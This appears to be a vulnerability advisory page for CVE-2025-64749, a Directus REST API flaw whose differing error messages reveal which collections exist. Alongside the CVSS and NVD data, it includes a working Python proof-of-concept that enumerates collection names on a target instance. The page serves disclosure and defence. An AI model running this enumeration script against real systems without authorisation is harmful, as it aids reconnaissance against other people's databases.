Security Vulnerability Report
中文
CVE-2025-64749 CVSS 4.3 MEDIUM

CVE-2025-64749

Published: 2025-11-13 22:15:52
Last Modified: 2025-12-08 15:02:34
Source: [email protected]

Description

Directus is a real-time API and App dashboard for managing SQL database content. An observable difference in error messaging was found in the Directus REST API in versions of Directus prior to version 11.13.0. The `/items/{collection}` API returns different error messages for two cases: when a user tries to access an existing collection which they are not authorized to access, and when user tries to access a non-existing collection. The two differing error messages leak the existence of collections to users which are not authorized to access these collections. Version 11.13.0 fixes the issue.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:* - VULNERABLE
Directus < 11.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64749 PoC - Directus Collection Enumeration # This PoC demonstrates the information disclosure vulnerability TARGET_URL = "http://target-directus-instance.com" # Replace with actual target URL # Common collection name patterns to test COMMON_COLLECTIONS = [ "users", "settings", "files", "roles", "permissions", "activity", "collections", "fields", "presets", "folders", "directus_collections", "directus_fields", "custom_collection" ] def check_collection_exists(collection_name, token=None): """ Send request to /items/{collection} endpoint Returns the error message from the response """ url = f"{TARGET_URL}/items/{collection_name}" headers = { "Content-Type": "application/json" } if token: headers["Authorization"] = f"Bearer {token}" try: response = requests.get(url, headers=headers, timeout=10) return response.json() except Exception as e: return {"error": str(e)} def analyze_error_message(response_data): """ Analyze error message to determine if collection exists The vulnerability allows distinguishing between: - Collection exists but user lacks permission - Collection does not exist """ error_msg = str(response_data).lower() # Check for signs of existing collection (permission denied) if "forbidden" in error_msg or "access denied" in error_msg or "permissions" in error_msg: return "EXISTS_NO_ACCESS" # Check for non-existing collection if "not found" in error_msg or "collection" not in error_msg: return "NOT_EXISTS" return "UNKNOWN" def main(): print(f"[*] CVE-2025-64749 PoC - Directus Collection Enumeration") print(f"[*] Target: {TARGET_URL}\n") discovered_collections = [] for collection in COMMON_COLLECTIONS: print(f"[*] Testing collection: {collection}") response = check_collection_exists(collection) result = analyze_error_message(response) if result == "EXISTS_NO_ACCESS": print(f" [+] Collection '{collection}' EXISTS (no access)") discovered_collections.append(collection) elif result == "NOT_EXISTS": print(f" [-] Collection '{collection}' does not exist") else: print(f" [?] Unknown response for '{collection}'") print(f"\n[*] Summary:") print(f" Discovered {len(discovered_collections)} collections:") for col in discovered_collections: print(f" - {col}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64749", "sourceIdentifier": "[email protected]", "published": "2025-11-13T22:15:52.390", "lastModified": "2025-12-08T15:02:34.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. An observable difference in error messaging was found in the Directus REST API in versions of Directus prior to version 11.13.0. The `/items/{collection}` API returns different error messages for two cases: when a user tries to access an existing collection which they are not authorized to access, and when user tries to access a non-existing collection. The two differing error messages leak the existence of collections to users which are not authorized to access these collections. Version 11.13.0 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-203"}, {"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.13.0", "matchCriteriaId": "19DDC40E-F676-4824-A433-37CFBEDFEBDB"}]}]}], "references": [{"url": "https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.